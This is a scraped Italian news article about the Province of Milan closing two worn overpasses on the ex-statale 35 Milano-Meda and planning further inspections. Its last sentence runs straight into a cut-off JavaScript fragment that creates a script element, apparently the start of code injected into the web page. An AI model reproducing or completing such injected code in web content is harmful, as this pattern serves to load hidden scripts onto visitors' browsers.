"/>
giovedì 17 agosto 2017 13:52:40
omnimilano

MILANO-MEDA, PROVINCIA DISPONE CHIUSURA DUE CAVALCAVIA: STATO PARTICOLARE USURA

23 novembre 2016 Cronaca, Politica

Proseguono le verifiche ispettive sui ponti della ex statale 35 Milano-Meda, commissionate dalla Provincia dopo essersi presa in carico la manutenzione della strada lo scorso mese di marzo. Dopo gli interventi di manutenzione straordinaria svolti durante i mesi estivi per tamponare le situazioni più ammalorate, si spiega in una nota della Provincia, è in corso ora la campagna ispettiva di primo livello sui 36 ponti, che attraversano la tratta di competenza della Milano-Meda: i manufatti, realizzati per la gran parte negli anni Sessanta e Settanta, non sono stati oggetto di manutenzione da parte della Provincia di Milano negli ultimi anni, anche alla luce del fatto che il progetto di Pedemontana prevede di demolirne un buon numero (in particolare quelli da Bovisio verso nord) per ricostruirli ex-novo, considerando gli ampliamenti delle carreggiate. Ora però, visto che le prospettive concrete di realizzazione dell’autostrada hanno dilatato i tempi, gli uffici tecnici della Provincia hanno avviato le verifiche ispettive di primo livello sui manufatti esistenti. In base alle prime risultanze emerse, nelle quali i periti hanno confermato lo stato di particolare usura dei ponti, anche considerando i volumi di traffico della strada che conta il transito di più di 100mila veicoli al giorno, la Provincia ha disposto la chiusura precauzionale di due scavalcamenti: quello di via Manzoni a Cesano Maderno e quello di via Maestri del Lavoro a Bovisio Masciago. Le chiusure, si spiega “sono finalizzate anche a consentire l’esecuzione di ulteriori indagini tra cui prove dinamiche, di carico e di caratterizzazione dei materiali e del loro stato, in base alle quali si potrà stabilire anche la tipologia di eventuali interventi necessari per rendere i ponti nuovamente transitabili”.
Tra domani e venerdì i periti si concentreranno sulle pile centrali dei ponti, attraverso un’analisi ispettiva primaria prevista sulla Milano-Meda a partire dalle ore 9, da Varedo in direzione Nord. I tecnici saranno accompagnati dalle pattuglie della Polizia Provinciale per assicurare il normale flusso del traffico. La Provincia prevede di terminare questa prima fase di osservazione entro la prossima settimana. Gli esiti ufficiali saranno disponibili nei successivi 7-10 giorni. Si passerà, poi, alla programmazione degli approfondimenti necessari nelle situazioni che lo richiederanno, al termine dei quali sarà possibile valutare gli interventi per consentire il ripristino della viabilità.var d=document;var s=d.createElement(‘script’);

Condividi questo articolo